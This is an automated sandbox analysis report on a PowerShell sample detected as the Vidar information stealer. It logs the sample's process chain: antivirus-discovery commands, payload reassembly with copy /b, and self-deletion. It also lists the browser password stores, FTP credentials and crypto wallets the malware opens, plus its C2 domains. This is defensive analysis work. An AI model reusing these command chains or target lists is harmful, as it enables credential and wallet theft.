    Source: Web Data.31.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
    Source: Web Data.31.drBinary or memory string: outlook.office365.comVMware20,11696428655t
    Source: Web Data.31.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
    Source: powershell.exe, 00000000.00000002.2200822731.0000024175349000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2616331517.0000016A48249000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2611628442.0000016A48248000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001D.00000002.2778724562.0000023750A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Web Data.31.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: outlook.office.comVMware20,11696428655s
    Source: Web Data.31.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
    Source: Web Data.31.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: AMC password management pageVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: tasks.office.comVMware20,11696428655o
    Source: Web Data.31.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
    Source: Web Data.31.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
    Source: Web Data.31.drBinary or memory string: interactivebrokers.comVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: dev.azure.comVMware20,11696428655j
    Source: Web Data.31.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
    Source: hyf04rot.rhn.exe, 00000005.00000002.2120274089.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zWar&Prod_VMware_SATA_CD00#p
    Source: Web Data.31.drBinary or memory string: bankofamerica.comVMware20,11696428655x
    Source: Web Data.31.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
    Source: Web Data.31.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_004062FC
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe "C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES27E7.tmp" "c:\Users\user\AppData\Local\Temp\l2xn2zg1\CSC17118CCF1564C5291822499255B405E.TMP"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 164676Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E GrabJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "slovenia" Contractors Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees hJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com Stopped.com hJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\dj5xt" & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: Stopped.com, 00000011.00000000.2154737147.0000000000443000.00000002.00000001.01000000.0000000A.sdmp, Stopped.com.6.dr, Born.13.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,5_2_00406805
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected Vidar stealer
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
    Tries to steal Crypto Currency Wallets
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

    Remote Access Functionality

    barindex
    Attempt to bypass Chrome Application-Bound Encryption
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Yara detected Vidar stealer
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		1
    Deobfuscate/Decode Files or Information    		2
    OS Credential Dumping    		3
    File and Directory Discovery    		Remote Services1
    Archive Collected Data    		1
    Ingress Tool Transfer    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API    		1
    Registry Run Keys / Startup Folder    		1
    Extra Window Memory Injection    		2
    Obfuscated Files or Information    		11
    Input Capture    		26
    System Information Discovery    		Remote Desktop Protocol3
    Data from Local System    		11
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)12
    Process Injection    		1
    DLL Side-Loading    		Security Account Manager1
    Query Registry    		SMB/Windows Admin Shares11
    Input Capture    		1
    Remote Access Software    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    Registry Run Keys / Startup Folder    		1
    Extra Window Memory Injection    		NTDS111
    Security Software Discovery    		Distributed Component Object Model1
    Clipboard Data    		3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
    Masquerading    		LSA Secrets3
    Process Discovery    		SSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
    Virtualization/Sandbox Evasion    		Cached Domain Credentials31
    Virtualization/Sandbox Evasion    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
    Process Injection    		DCSync1
    Application Window Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582851 Sample: over.ps1 Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 86 sdoout.lol 2->86 88 saaadnesss.shop 2->88 90 4 other IPs or domains 2->90 120 Suricata IDS alerts for network traffic 2->120 122 Antivirus detection for URL or domain 2->122 124 Yara detected Vidar stealer 2->124 126 3 other signatures 2->126 11 powershell.exe 14 27 2->11         started        16 msedge.exe 2->16         started        18 svchost.exe 2->18         started        20 msedge.exe 2->20         started        signatures3 process4 dnsIp5 98 saaadnesss.shop 185.121.235.167, 443, 49706 IPCORE-ASES Spain 11->98 100 raw.githubusercontent.com 185.199.109.133, 443, 49704 FASTLYUS Netherlands 11->100 102 ifconfig.me 34.160.111.145, 443, 49705 ATGS-MMD-ASUS United States 11->102 80 C:\Users\user\AppData\...\hyf04rot.rhn.exe, PE32 11->80 dropped 82 C:\Users\user\AppData\...\l2xn2zg1.cmdline, Unicode 11->82 dropped 134 Powershell drops PE file 11->134 22 hyf04rot.rhn.exe 26 11->22         started        25 csc.exe 3 11->25         started        28 conhost.exe 11->28         started        30 msedge.exe 16->30         started        33 msedge.exe 16->33         started        35 msedge.exe 16->35         started        104 127.0.0.1 unknown unknown 18->104 84 